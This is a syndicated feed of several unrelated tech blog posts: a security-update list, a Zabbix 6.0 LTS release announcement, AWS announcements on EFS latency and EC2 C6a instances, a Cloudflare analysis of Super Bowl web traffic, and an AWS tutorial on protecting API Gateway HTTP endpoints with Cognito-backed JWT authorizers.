Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/884829/

Security updates have been issued by Debian (h2database), Fedora (dotnet-build-reference-packages, dotnet3.1, and firefox), Oracle (.NET 5.0, firefox, kernel, and kernel-container), Red Hat (firefox), Scientific Linux (firefox), SUSE (unbound), and Ubuntu (firefox).

Zabbix 6.0 LTS is out now!

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/zabbix-6-0-lts-is-out-now/18757/

The Zabbix team is proud to announce the release of Zabbix 6.0 LTS. The latest version comes packed with many new features, improvements, new templates and integrations.

New features

  • Out-of-the-box High Availability cluster for Zabbix server with support for one or multiple standby nodes
  • Redesigned Services section, tailored for flexible Business Service monitoring with the ability to monitor over 100k services, define flexible service calculation rules, perform root cause analysis, receive service status change alerts, and more
  • New machine learning trend functions for baseline monitoring and anomaly detection
  • Monitor your Kubernetes instance with out-of-the-box monitoring for pods, nodes, and Kubernetes components
  • New Audit log schema enables detailed logging for both the Zabbix frontend and backend
  • Track your host status and location with the new Geomap widget
  • The Top hosts widget provides Top N and Bottom N host views sorted by item values
  • Ability to define custom Zabbix password complexity requirements
  • Multiple UI improvements. Hosts can now be created directly from the Monitoring section.
  • Zabbix Agent2 now supports loading stand-alone plugins without having to recompile the Agent2
  • Monitor SSL/TLS certificates with a new Zabbix Agent2 item
  • Performance improvements for Zabbix Server, Proxy, and Frontend
  • All of the official Zabbix templates are now stand-alone and do not require importing additional template dependencies

  • And many other improvements and features

This version also provides a set of new templates for the following vendors:

  • F5 BIG-IP
  • Cisco ASAv
  • HPE ProLiant servers
  • Cloudflare
  • InfluxDB
  • Travis CI
  • Dell PowerEdge
  • pfSense
  • Kubernetes
  • Mikrotik
  • Nginx Plus
  • VMware SD-WAN VeloCloud
  • GridGain
  • Systemd
  • As well as a new GitHub webhook integration

The latest LTS release will receive full official support for 3 years and limited support, consisting of bug fixes, for 5 years.

Find out more about Zabbix 6.0 LTS by attending our What’s new in Zabbix 6.0 LTS webinar, covering the most important new features and improvements: https://www.zabbix.com/webinars

An overview of the new features and changes can be found on our What’s new in Zabbix 6.0 page:

https://www.zabbix.com/whats_new_6_0

What’s new in Zabbix 6.0.0 documentation section:

https://www.zabbix.com/documentation/current/en/manual/introduction/whatsnew600

Take a look at the release notes to see the full list of new features and improvements:

https://www.zabbix.com/rn/rn6.0.0

Zabbix 6.0 LTS packages

The official Zabbix packages are available for:

  • Linux distributions for different hardware platforms: RHEL, CentOS, Oracle Linux, Debian, SUSE, Ubuntu, Raspbian
  • Virtualization platforms: VMware, VirtualBox, Hyper-V, Xen
  • Docker
  • Packages and pre-compiled agents for the most popular platforms, including macOS, and MSI packages for Windows

You can find the download instructions and download the new version on the download page: https://www.zabbix.com/download

One-click deployment is available for the following cloud platforms:

  • AWS, Azure, Google Cloud, Digital Ocean, Linode, Oracle Cloud, Red Hat OpenShift, Yandex Cloud

Zabbix 6.0 also incorporates the features added in Zabbix 5.2 and Zabbix 5.4 non-LTS versions.

Upgrading to Zabbix 6.0 LTS

To upgrade to Zabbix 6.0 LTS, upgrade your repository package, then download and install the new Zabbix component packages (Zabbix server, proxy, frontend, and other Zabbix components). When you start the Zabbix server, an automatic database schema upgrade is performed. Zabbix agents are backward compatible, so installing the new agent versions is not required; you can do it at a later time if needed.

If you’re using the official Docker container images – simply deploy a new set of containers for your Zabbix components. Once the Zabbix server container connects to the backend database, the database upgrade will be performed automatically.

You can find step-by-step instructions for the upgrade process to Zabbix 6.0 LTS in the Zabbix documentation.

If you’re interested in a list of changes and an additional pre-upgrade checklist – the following blog post covers the nuances of the upgrade process and takes a look under the hood at what changes are performed during the upgrade.

The post Zabbix 6.0 LTS is out now! appeared first on Zabbix Blog.

Amazon Elastic File System Update – Sub-Millisecond Read Latency

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/amazon-elastic-file-system-update-sub-millisecond-read-latency/

Amazon Elastic File System (Amazon EFS) was announced in early 2015 and became generally available in 2016. We launched EFS in order to make it easier for you to build applications that need shared access to file data. EFS is (and always has been) simple and serverless: you simply create a file system, attach it to any number of EC2 instances, Lambda functions, or containers, and go about your work. EFS is highly durable and scalable, and gives you a strong read-after-write consistency model.

Since the 2016 launch we have added many new features and capabilities including encryption of data at rest and in transit, an Infrequent Access storage class, and several other lower cost storage classes. We have also worked to improve performance, delivering a 400% increase in read operations per second, a 100% increase in per-client throughput, and then a further tripling of read throughput.

Our customers use EFS file systems to support many different applications and use cases including home directories, build farms, content management (WordPress and Drupal), DevOps (Git, GitLab, Jenkins, and Artifactory), and machine learning inference, to name a few.

Sub-Millisecond Read Latency
Faster is always better, and today I am thrilled to be able to tell you that your latency-sensitive EFS workloads can now run about twice as fast as before!

Up until today, EFS latency for read operations (both data and metadata) was typically in the low single-digit milliseconds. Effective today, new and existing EFS file systems now provide average latency as low as 600 microseconds for the majority of read operations on data and metadata.

This performance boost applies to One Zone and Standard General Purpose EFS file systems. New or old, you will still get the same availability, durability, scalability, and strong read-after-write consistency that you have come to expect from EFS, at no additional cost and with no configuration changes.

We “flipped the switch” and enabled this performance boost for all existing EFS General Purpose mode file systems over the course of the last few weeks, so you may already have noticed the improvement. Of course, any new file systems that you create will also benefit.

Learn More
To learn more about the performance characteristics of EFS, read Amazon EFS Performance.

Jeff;

PS – Our multi-year roadmap contains a bunch of short-term and long-term performance enhancements, so stay tuned for more good news!

New – Amazon EC2 C6a Instances Powered By 3rd Gen AMD EPYC Processors for Compute-Intensive Workloads

Post Syndicated from Channy Yun original https://aws.amazon.com/blogs/aws/new-amazon-ec2-c6a-instances-powered-by-3rd-gen-amd-epyc-processors-for-compute-intensive-workloads/

At AWS re:Invent 2021, we launched Amazon EC2 M6a instances powered by the 3rd Gen AMD EPYC processors, running at frequencies up to 3.6 GHz, which offer customers up to 35 percent improvement in price-performance compared to M5a instances.

Many customers are looking for ways to optimize their cloud utilization, and they are taking advantage of the compute choice that Amazon EC2 offers. Customers such as Dropbox, Capital One, and Sprinklr have been able to realize the cost benefits of AWS using EC2 instances powered by AMD EPYC processors.

Today, I am happy to announce the availability of the new compute-optimized Amazon EC2 C6a instances, which offer up to 15 percent improvement in price-performance versus C5a instances, and 10 percent lower cost than comparable x86-based EC2 instances.

These instances are ideal for running compute-intensive workloads such as high-performance web servers, batch processing, ad serving, multiplayer gaming, video encoding, high performance computing (HPC) such as scientific modeling, and machine learning.

Compared to C5a instances, this new instance type provides:

To increase instance security, C6a instances have always-on memory encryption with AMD Transparent Single Key Memory Encryption (TSME), and support new AVX2 instructions for accelerating encryption and decryption algorithms.

Like M6a, C6a instances are also available in 10 sizes:

Name           vCPUs   Memory (GiB)   Network Bandwidth (Gbps)   EBS Throughput (Gbps)
c6a.large          2              4                 Up to 12.5               Up to 6.6
c6a.xlarge         4              8                 Up to 12.5               Up to 6.6
c6a.2xlarge        8             16                 Up to 12.5               Up to 6.6
c6a.4xlarge       16             32                 Up to 12.5               Up to 6.6
c6a.8xlarge       32             64                       12.5                     6.6
c6a.12xlarge      48             96                      18.75                      10
c6a.16xlarge      64            128                         25                    13.3
c6a.24xlarge      96            192                       37.5                      20
c6a.32xlarge     128            256                         50                    26.6
c6a.48xlarge     192            384                         50                      40
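As a quick illustration of reading the table, here is a hedged sketch that picks the smallest C6a size meeting given vCPU and memory requirements. The data is transcribed from the table above; the helper function name is our own invention.

```javascript
// C6a sizes from the table above: [name, vCPUs, memory in GiB],
// ordered smallest to largest.
const c6aSizes = [
  ["c6a.large", 2, 4], ["c6a.xlarge", 4, 8], ["c6a.2xlarge", 8, 16],
  ["c6a.4xlarge", 16, 32], ["c6a.8xlarge", 32, 64], ["c6a.12xlarge", 48, 96],
  ["c6a.16xlarge", 64, 128], ["c6a.24xlarge", 96, 192],
  ["c6a.32xlarge", 128, 256], ["c6a.48xlarge", 192, 384],
];

// Return the smallest size satisfying both requirements, or null.
function smallestC6a(vcpus, memGiB) {
  const hit = c6aSizes.find(([, v, m]) => v >= vcpus && m >= memGiB);
  return hit ? hit[0] : null;
}

console.log(smallestC6a(12, 20)); // "c6a.4xlarge"
```

For a workload needing 12 vCPUs and 20 GiB of memory, the smallest fit is c6a.4xlarge (16 vCPUs, 32 GiB).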

The new instances are built on the AWS Nitro System, a collection of building blocks that offloads many of the traditional virtualization functions to dedicated hardware for high performance, high availability, and highly secure cloud instances.

Available Now
C6a instances are available today in three AWS Regions: US East (N. Virginia), US West (Oregon), and EU (Ireland). As usual with EC2, you pay for what you use. For more information, see the EC2 pricing page.

To learn more, visit the EC2 C6a instance and AWS/AMD partner page. You can send feedback to [email protected], AWS re:Post for EC2, or through your usual AWS Support contacts.

Channy

Who won Super Bowl LVI? A look at Internet traffic during the big game

Post Syndicated from João Tomé original https://blog.cloudflare.com/who-won-super-bowl-lvi-a-look-at-internet-traffic-during-the-big-game/

“It’s ridiculous for a country to get all worked up about a game—except the Super Bowl, of course. Now that’s important.”
Andy Rooney, American radio and television writer

When the Super Bowl is on, there are more winners than just one of the teams playing, especially when we look at Internet trends. By now, everyone knows that the Los Angeles Rams won, but we also want to look at which Super Bowl advertisers were the biggest winners, and how traffic to food delivery services, social media and messaging apps, and sports and betting websites changed throughout the game.

We covered some of these questions during our Super Bowl live-tweeting on our Cloudflare Radar account. (Hint: follow us if you’re interested in Internet trends).

Cloudflare Radar uses a variety of sources to provide aggregate information about Internet traffic and attack trends. In this blog post, as we did last year, we use DNS name resolution data to estimate traffic to websites. We can’t see who visited the websites mentioned, or what anyone did on the websites, but DNS can give us an estimate of the interest generated by the ads or across a set of sites in the categories listed above.

The baseline value for the charts was calculated by taking the mean traffic level for the associated websites during 12:00 – 15:00 EST on Super Bowl Sunday (February 13, 2022).
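The "Nx over baseline" figures in the sections that follow can be sketched with a toy calculation. The series and numbers below are invented for illustration; Radar's actual pipeline aggregates DNS resolution data we don't have access to.

```javascript
// Normalize a traffic series against the mean of a baseline window,
// yielding "Nx over baseline" multipliers for each bucket.
function baselineMultipliers(series, baselineStart, baselineEnd) {
  const window = series.slice(baselineStart, baselineEnd);
  const baseline = window.reduce((a, b) => a + b, 0) / window.length;
  return series.map(v => v / baseline);
}

// Invented DNS resolution counts per time bucket; the first four
// buckets stand in for the 12:00–15:00 EST baseline window.
const counts = [100, 110, 90, 100, 2500];
console.log(baselineMultipliers(counts, 0, 4));
// last bucket is 25x over the baseline mean
```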

The Big Picture

To get the ball rolling, let’s focus on the two teams that made it to the big game: the Bengals website had some spikes before kickoff and during the second half, but the Rams website had a great run and, just like on the field, had their biggest peak at the end.


Super Bowl Sunday is not only about the ads – part of the excitement around watching the game with friends and family is having a great assortment of food and snacks. So, let’s start with the aggregated traffic to a set of food delivery services that clearly builds to a peak around 17:30, one hour before kickoff. After that, traffic generally decreases but increases slightly after the second half starts.

When we look at traffic to sports websites, there’s a build up to a peak as the game began at 18:30.

As the game progressed, traffic dropped off, but spiked three times during halftime (between 20:00 and 20:30). After the Rams victory was assured, traffic to those websites saw a final peak.

We can also see below that aggregated traffic to video platforms had a pattern similar to sports websites, with two peaks at halftime and a third notable one at the end of the game. After kickoff (18:30) the first peak occurred around the same time Coinbase’s bouncing QR code commercial aired.

How about social media? Aggregate traffic to social media sites started to decrease after 17:00, hitting its lowest point just before kickoff.

During the game, there was a clear spike (the biggest of the afternoon/evening) after the Coinbase QR code ad aired. At halftime, social media traffic dropped off before peaking again right before the second half started. A final peak occurred after the game ended.

Finally, let’s look at messaging services. Among this set of domains, there wasn’t as much of a decrease as we saw in social media heading into kickoff, but there was a spike around 19:00 after the second batch of commercials was aired. Traffic continued to grow through halftime and into the third quarter before starting to drop heading towards the end of the game. Similar to several of the other categories above, messaging traffic again rose after the end of the game.

The Internet Impact of Commercials

Historically, many people have watched the Super Bowl as much for the ads as the actual football game. (Maybe even more so some years…) Many of the advertisements are now posted online ahead of Super Bowl Sunday. Given that, do these commercials still drive traffic to the company’s website while the game is on? As we saw in 2021, the answer remains a resounding yes.

The first Bud Light ad during the game (at 18:52) drove a more than 25x increase to their site, and the Bud Light Seltzer Hard Soda ad with Guy Fieri at 21:00 drove a second peak in traffic, with a 15x increase over baseline.

The Pringles commercial (at 21:00), where a hand stuck in a Pringles can really stuck with viewers, resulted in a greater than 35x increase. Meanwhile, Lay’s got a 30x bump in traffic from their wedding memories ad at 20:53.

The Doritos website had already experienced some spikes throughout the afternoon, but jungle animals singing the Salt-N-Pepa hit ‘Push It’  (19:13) drove a more than 12x increase in traffic. However, last year’s ad with a flat virtual Matthew McConaughey seemed to have more impact.

Brands that might not be so well known often get a large traffic boost from their Super Bowl commercials. For example, the cocktail company Cutwater Spirits’ “here’s to the lazy ones” ad, their first at the Super Bowl, resulted in an 800x increase in traffic. (The Michelob Ultra bowling ad with Peyton Manning drove a similar increase in traffic.)

Financial services: the QR code

We already saw that the Coinbase ad seemed to make social media tick up after it aired, but what about traffic to Coinbase itself? The ad drove a 14x increase in traffic. (However, it is worth noting that scanning the QR code in the advertisement took viewers to drops.coinbase.com – this specific hostname is not included in the traffic analyzed for this graph.)

In comparison, the Crypto.com ad featuring LeBron James having a conversation with his 2003 self generated a 3x increase in traffic to their website, while the FTX ad where Larry David gives bad advice through human history only resulted in 1.5x traffic growth.

On the other hand, the eToro “to the moon” ad that ran during the second half of the game drove a 25x increase in traffic (at halftime there was another 20x bump).

In the classic financial services world, there was a new kid on the block that experienced a much bigger bump (140x) in traffic. The Greenlight ad featuring the purchasing habits of Modern Family’s Phil Dunphy (Ty Burrell) aired late in the game (21:45) but clearly made an impact.

Electric cars (Dr. Evil) takeover

Car commercials have aired for many years during the Super Bowl, teasing new models and technologies. In 2022, electric cars were (again) a popular subject of Super Bowl ads. Blending modern day, 80’s nostalgia, and ancient mythology, BMW rocked down to Electric Avenue as their ad (18:54) resulted in a 14x increase over baseline in traffic.

However, our data showed that there was a clear winner among automobile makers: the Dr. Evil (one of Mike Myers’s characters from Austin Powers) takeover of General Motors ad drove traffic to a peak of over 400x above baseline.

Ads from other car vendors, including Toyota (5x), Kia (16x), Vroom (70x), and Nissan (30x), also generated attention and increased traffic to their websites. Highlighting the importance of charging to the electric car ecosystem, the first ever Super Bowl ad from Wallbox (a manufacturer of electric car chargers) powered a huge increase in traffic to their website, reaching a peak over 2,500x higher than baseline.

Last but not least

One of the health-related products that made its mark on the Super Bowl was the early-detection medical service Hologic, whose ad featured Mary J. Blige. They experienced a 140x traffic spike.

Another example that really showed that having a successful Super Bowl commercial doesn’t stink was Irish Spring soap, whose good ‘smelling’ ad drove a traffic increase to their website of nearly 200x over baseline.

Among ads for travel-related companies, the biggest increase in traffic we saw was from Booking.com (21:23), with the adventures of Idris Elba gaining them a 1.6x bump.

Several ads promoted shows and movie trailers, including Dr. Strange 2 and Amazon Prime Video’s The Rings of Power, but the trailer for Jordan Peele’s Nope movie generated a nearly 40x increase in traffic.

And the winner is…

Popular smart home gadgets appeared to be jealous of the new COVID-19 testing device from Cue Health, but Super Bowl viewers were clearly curious about it. The company’s ad drove an astronomical 10,000x increase in traffic to their website after it aired.

Conclusion

We saw again that when humans change their behavior, Internet traffic reflects it (the network of networks is, after all, a human invention for humans).

Remember, visit Cloudflare Radar for up-to-date Internet traffic and attack trends, and follow the Cloudflare Radar Twitter account for regular insights on Internet events.

How to secure API Gateway HTTP endpoints with JWT authorizer

Post Syndicated from Siva Rajamani original https://aws.amazon.com/blogs/security/how-to-secure-api-gateway-http-endpoints-with-jwt-authorizer/

This blog post demonstrates how you can secure Amazon API Gateway HTTP endpoints with JSON web token (JWT) authorizers. Amazon API Gateway helps developers create, publish, and maintain secure APIs at any scale, helping manage thousands of API calls. There are no minimum fees, and you only pay for the API calls you receive.

Based on customer feedback and lessons learned from building the REST and WebSocket APIs, AWS launched HTTP APIs for Amazon API Gateway, a service built to be fast, low cost, and simple to use. HTTP APIs offer a solution for building APIs, as well as multiple mechanisms for controlling and managing access through AWS Identity and Access Management (IAM) authorizers, AWS Lambda authorizers, and JWT authorizers.

This post includes step-by-step guidance for setting up JWT authorizers using Amazon Cognito as the identity provider, configuring HTTP APIs to use JWT authorizers, and examples to test the entire setup. If you want to protect HTTP APIs using Lambda and IAM authorizers, you can refer to Introducing IAM and Lambda authorizers for Amazon API Gateway HTTP APIs.

Prerequisites

Before you can set up a JWT authorizer using Cognito, you first need to create three Lambda functions. You should create each Lambda function using the following configuration settings, permissions, and code:

  1. The first Lambda function (Pre-tokenAuthLambda) is invoked before token generation, allowing you to customize the claims in the identity token.
  2. The second Lambda function (LambdaForAdminUser) acts as the HTTP API Gateway integration target for the /AdminUser route.
  3. The third Lambda function (LambdaForRegularUser) acts as the HTTP API Gateway integration target for the /RegularUser route.

IAM policy for Lambda function

You first need to create an IAM role using the following IAM policy for each of the three Lambda functions:

	{
		"Version": "2012-10-17",
		"Statement": [
			{
				"Effect": "Allow",
				"Action": "logs:CreateLogGroup",
				"Resource": "arn:aws:logs:us-east-1:<AWS Account Number>:*"
			},
			{
				"Effect": "Allow",
				"Action": [
					"logs:CreateLogStream",
					"logs:PutLogEvents"
				],
				"Resource": [
					"arn:aws:logs:us-east-1:<AWS Account Number>:log-group:/aws/lambda/<Name of the Lambda functions>:*"
				]
			}
		]
	}

Settings for the required Lambda functions

For the three Lambda functions, use these settings:

Function name: Enter an appropriate name for the Lambda function, for example:

  • Pre-tokenAuthLambda for the first Lambda
  • LambdaForAdminUser for the second
  • LambdaForRegularUser for the third

Runtime: Choose Node.js 12.x.

Permissions: Choose Use an existing role and select the role you created with the IAM policy in the Prerequisites section above.

Pre-tokenAuthLambda code

This first Lambda code, Pre-tokenAuthLambda, converts the authenticated user’s Cognito group details to be returned as the scope claim in the id_token returned by Cognito.

	exports.lambdaHandler = async (event, context) => {
		let newScopes = event.request.groupConfiguration.groupsToOverride.map(
			item => `${item}-${event.callerContext.clientId}`
		);
		event.response = {
			"claimsOverrideDetails": {
				"claimsToAddOrOverride": {
					"scope": newScopes.join(" ")
				}
			}
		};
		return event;
	};
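To see what this trigger does, here is a hedged local invocation sketch using the same logic, with an invented event shaped like Cognito's Pre Token Generation payload. The group names and client ID below are made up for illustration.

```javascript
// Same claim-override logic as Pre-tokenAuthLambda above, invoked
// locally with a hand-built sample event.
const lambdaHandler = async (event) => {
  const newScopes = event.request.groupConfiguration.groupsToOverride.map(
    item => `${item}-${event.callerContext.clientId}`
  );
  event.response = {
    claimsOverrideDetails: {
      claimsToAddOrOverride: { scope: newScopes.join(" ") }
    }
  };
  return event;
};

// Invented sample: a user in the "admin" and "regular" groups,
// authenticating against app client "1abc2def".
lambdaHandler({
  request: { groupConfiguration: { groupsToOverride: ["admin", "regular"] } },
  callerContext: { clientId: "1abc2def" },
}).then(out =>
  console.log(out.response.claimsOverrideDetails.claimsToAddOrOverride.scope)
);
// prints "admin-1abc2def regular-1abc2def"
```

Each group name is suffixed with the app client ID, which is what the route-level authorization scopes configured later in this post match against.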

LambdaForAdminUser code

This Lambda code, LambdaForAdminUser, acts as the HTTP API Gateway integration target and sends back the response Hello from Admin User when the /AdminUser resource path is invoked in API Gateway.

	exports.handler = async (event) => {

		const response = {
			statusCode: 200,
			body: JSON.stringify('Hello from Admin User'),
		};
		return response;
	};

LambdaForRegularUser code

This Lambda code, LambdaForRegularUser, acts as the HTTP API Gateway integration target and sends back the response Hello from Regular User when the /RegularUser resource path is invoked within API Gateway.

	exports.handler = async (event) => {

		const response = {
			statusCode: 200,
			body: JSON.stringify('Hello from Regular User'),
		};
		return response;
	};

Deploy the solution

To secure the API Gateway resources with JWT authorizer, complete the following steps:

  1. Create an Amazon Cognito User Pool with an app client that acts as the JWT authorizer
  2. Create API Gateway resources and secure them using the JWT authorizer based on the configured Amazon Cognito User Pool and app client settings.

The procedures below will walk you through the step-by-step configuration.

Set up JWT authorizer using Amazon Cognito

The first step to set up the JWT authorizer is to create an Amazon Cognito user pool.

To create an Amazon Cognito user pool

  1. Go to the Amazon Cognito console.
  2. Choose Manage User Pools, then choose Create a user pool.
    Figure 1: Create a user pool

    Figure 1: Create a user pool

  3. Enter a Pool name, then choose Review defaults.
    Figure 2: Review defaults while creating the user pool

    Figure 2: Review defaults while creating the user pool

  4. Choose Add app client.
    Figure 3: Add an app client for the user pool

    Figure 3: Add an app client for the user pool

  5. Enter an app client name. For this example, keep the default options. Choose Create app client to finish.
    Figure 4: Review the app client configuration and create it

    Figure 4: Review the app client configuration and create it

  6. Choose Return to pool details, and then choose Create pool.
    Figure 5: Complete the creation of user pool setup

    Figure 5: Complete the creation of user pool setup

To configure Cognito user pool settings

Now you can configure app client settings:

  1. On the left pane, choose App client settings. In Enabled Identity Providers, select the identity providers you want for the apps you configured in the App Clients tab.
  2. Enter the Callback URLs you want, separated by commas. These URLs apply to all selected identity providers.
  3. Under OAuth 2.0, select from the following options:
    • For Allowed OAuth Flows, select Authorization code grant.
    • For Allowed OAuth Scopes, select phone, email, openid, and profile.
  4. Choose Save changes.
    Figure 6: Configure app client settings

    Figure 6: Configure app client settings

  5. Now add the domain prefix to use for the sign-in pages hosted by Amazon Cognito. On the left pane, choose Domain name and enter the appropriate domain prefix, then Save changes.
    Figure 7: Choose a domain name prefix for the Amazon Cognito domain

    Figure 7: Choose a domain name prefix for the Amazon Cognito domain

  6. Next, create the pre-token generation trigger. On the left pane, choose Triggers and under Pre Token Generation, select the Pre-tokenAuthLambda Lambda function you created in the Prerequisites procedure above, then choose Save changes.
    Figure 8: Configure Pre Token Generation trigger Lambda for user pool

    Figure 8: Configure Pre Token Generation trigger Lambda for user pool

  7. Finally, create two Cognito groups named admin and regular. Create two Cognito users named adminuser and regularuser. Assign adminuser to both admin and regular group. Assign regularuser to regular group.
    Figure 9: Create groups and users for user pool

    Figure 9: Create groups and users for user pool

Configuring HTTP endpoints with JWT authorizer

The first step to configure HTTP endpoints is to create the API in the API Gateway management console.

To create the API

  1. Go to the API Gateway management console and choose Create API.
    Figure 10: Create an API in API Gateway management console

    Figure 10: Create an API in API Gateway management console

  2. Choose HTTP API and select Build.
    Figure 11: Choose Build option for HTTP API

    Figure 11: Choose Build option for HTTP API

  3. Under Create and configure integrations, enter JWTAuth for the API name and choose Review and Create.
    Figure 12: Create Integrations for HTTP API

    Figure 12: Create Integrations for HTTP API

  4. Once you’ve created the API JWTAuth, choose Routes on the left pane.
    Figure 13: Navigate to Routes tab

    Figure 13: Navigate to Routes tab

  5. Choose Create a route and select GET method. Then, enter /AdminUser for the path.
    Figure 14: Create the first route for HTTP API

    Figure 14: Create the first route for HTTP API

  6. Repeat step 5 and create a second route using the GET method and /RegularUser for the path.
    Figure 15: Create the second route for HTTP API

    Figure 15: Create the second route for HTTP API

To create API integrations

  1. Now that the two routes are created, select Integrations from the left pane.
    Figure 16: Navigate to Integrations tab

    Figure 16: Navigate to Integrations tab

  2. Select GET for the /AdminUser resource path, and choose Create and attach an integration.
    Figure 17: Attach an integration to first route

    Figure 17: Attach an integration to first route

  3. To create an integration, select the following values:

    Integration type: Lambda function
    Integration target: LambdaForAdminUser

  4. Choose Create.
    NOTE: LambdaForAdminUser is the Lambda function you previously created as part of the Prerequisites procedure LambdaForAdminUser code.
    Figure 18: Create an integration for first route

    Figure 18: Create an integration for first route

  5. Next, select GET for the /RegularUser resource path and choose Create and attach an integration.
    Figure 19: Attach an integration to second route

    Figure 19: Attach an integration to second route

  6. To create an integration, select the following values:

    Integration type: Lambda function
    Integration target: LambdaForRegularUser

  7. Choose Create.
    NOTE: LambdaForRegularUser is the Lambda function you previously created as part of the Prerequisites procedure LambdaForRegularUser code.
    Figure 20: Create an integration for the second route

    Figure 20: Create an integration for the second route

To configure API authorization

  1. Select Authorization from the left pane, select /AdminUser path and choose Create and attach an authorizer.
    Figure 21: Navigate to Authorization left pane option to create an authorizer

    Figure 21: Navigate to Authorization left pane option to create an authorizer

  2. For Authorizer type select JWT and under Authorizer settings enter the following details:

    Name: JWTAuth
    Identity source: $request.header.Authorization
    Issuer URL: https://cognito-idp.us-east-1.amazonaws.com/<your_userpool_id>
    Audience: <app_client_id_of_userpool>
  3. Choose Create.
    Figure 22: Create and attach an authorizer to HTTP API first route

    Figure 22: Create and attach an authorizer to HTTP API first route

  4. In the Authorizer for route GET /AdminUser screen, choose Add scope in the Authorization Scope section and enter scope name as admin-<app_client_id> and choose Save.
    Figure 23: Add authorization scopes to first route of HTTP API


  5. Now select the /RegularUser path and from the dropdown, select the JWTAuth authorizer you created in step 3. Choose Attach authorizer.
    Figure 24: Attach an authorizer to HTTP API second route


  6. Choose Add scope and enter the scope name as regular-<app_client_id> and choose Save.
    Figure 25: Add authorization scopes to second route of HTTP API


  7. To create a stage, enter Test as the Name and then choose Create.
    Figure 26: Create a stage for HTTP API


  8. Under Select a stage, enter Test, and then choose Deploy to stage.
    Figure 27: Deploy HTTP API to stage


Test the JWT authorizer

You can use the following examples to test the API authentication. We use curl in these examples, but you can use any HTTP client.

To test the API authentication

  1. Send a GET request to the /RegularUser HTTP API resource without specifying any authorization header.
    curl -s -X GET https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/RegularUser

    API Gateway returns a 401 Unauthorized response, as expected.

    {"message":"Unauthorized"}

  2. Because the required $request.header.Authorization identity source was not provided, the JWT authorizer was not called. Next, supply a valid Authorization header key and value by authenticating as regularuser with the aws cognito-idp initiate-auth AWS CLI command.
    aws cognito-idp initiate-auth --auth-flow USER_PASSWORD_AUTH --client-id <Cognito User Pool App Client ID> --auth-parameters USERNAME=regularuser,PASSWORD=<Password for regularuser>

    CLI Command response:

    
    {
    	"ChallengeParameters": {},
    	"AuthenticationResult": {
    		"AccessToken": "6f5e4d3c2b1a111112222233333xxxxxzz2yy",
    		"ExpiresIn": 3600,
    		"TokenType": "Bearer",
    		"RefreshToken": "xyz123abc456dddccc0000",
    		"IdToken": "aaabbbcccddd1234567890"
    	}
    }

    The command response contains a JWT (IdToken) with information about the authenticated user, which can be used as the Authorization header value.

    curl -H "Authorization: aaabbbcccddd1234567890" -s -X GET https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/RegularUser

  3. API Gateway returns the response Hello from Regular User. Now test access to the /AdminUser HTTP API resource with the same JWT token for regularuser.
    curl -H "Authorization: aaabbbcccddd1234567890" -s -X GET "https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/AdminUser"

    API Gateway returns a 403 – Forbidden response:
    {"message":"Forbidden"}
    The JWT token for regularuser lacks the authorization scope defined for the /AdminUser resource, so API Gateway rejects the request.

  4. Next, log in as adminuser and validate that you can successfully access both the /RegularUser and /AdminUser resources. Use the cognito-idp initiate-auth AWS CLI command again.
  5. aws cognito-idp initiate-auth --auth-flow USER_PASSWORD_AUTH --client-id <Cognito User Pool App Client ID> --auth-parameters USERNAME=adminuser,PASSWORD=<Password for adminuser>

    CLI Command response:

    
    {
    	"ChallengeParameters": {},
    	"AuthenticationResult": {
    		"AccessToken": "a1b2c3d4e5c644444555556666Y2X3Z1111",
    		"ExpiresIn": 3600,
    		"TokenType": "Bearer",
    		"RefreshToken": "xyz654cba321dddccc1111",
    		"IdToken": "a1b2c3d4e5c6aabbbcccddd"
    	}
    }

  6. Using curl, validate that the adminuser JWT token has access to both the /RegularUser and the /AdminUser resources. This works because adminuser is a member of both Amazon Cognito groups, so the JWT token contains both authorization scopes.
    curl -H "Authorization: a1b2c3d4e5c6aabbbcccddd" -s -X GET https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/RegularUser

    API Gateway returns the response Hello from Regular User.

    curl -H "Authorization: a1b2c3d4e5c6aabbbcccddd" -s -X GET https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/AdminUser

    API Gateway returns the response Hello from Admin User.
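The 401/403/200 behavior above is driven by claims carried inside the tokens. As a quick way to see those claims, you can decode a JWT's payload segment. This is a minimal sketch using a fabricated token with hypothetical claim names and values (a real IdToken is issued and signed by the Amazon Cognito user pool, and API Gateway also verifies that signature):

```python
import base64
import json

def jwt_claims(token: str) -> dict:
    """Decode a JWT's payload WITHOUT verifying its signature (inspection only)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))

def b64url(obj) -> str:
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")

# Fabricated token; the group name and scope value below are illustrative only.
token = ".".join([
    b64url({"alg": "RS256"}),
    b64url({"cognito:groups": ["regular-user-group"], "scope": "regular-a1b2c3d4"}),
    "fake-signature",
])

print(jwt_claims(token)["scope"])  # -> regular-a1b2c3d4
```

Never skip signature verification when a token is actually used for authorization; decoding like this is only useful for troubleshooting which scopes a token carries.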

Conclusion

AWS provides multiple ways to manage access to an HTTP API in API Gateway: Lambda authorizers, IAM roles and policies, and JWT authorizers. This post demonstrated how to secure API Gateway HTTP API endpoints with a JWT authorizer, configured with Amazon Cognito as the identity provider (IdP); you can achieve the same results with any IdP that supports OAuth 2.0 standards. API Gateway validates the JWT that the client submits with each API request and allows or denies the request based on the token's validity and scopes. You can configure distinct authorizers for each route of an API, or use the same authorizer for multiple routes.


If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Author

Siva Rajamani

Siva is a Boston-based Enterprise Solutions Architect. He enjoys working closely with customers and supporting their digital transformation and AWS adoption journey. His core areas of focus are Serverless, Application Integration, and Security.

Author

Sudhanshu Malhotra

Sudhanshu is a Boston-based Enterprise Solutions Architect for AWS. He’s a technology enthusiast who enjoys helping customers find innovative solutions to complex business challenges. His core areas of focus are DevOps, Machine Learning, and Security. When he’s not working with customers on their journey to the cloud, he enjoys reading, hiking, and exploring new cuisines.

Author

Rajat Mathur

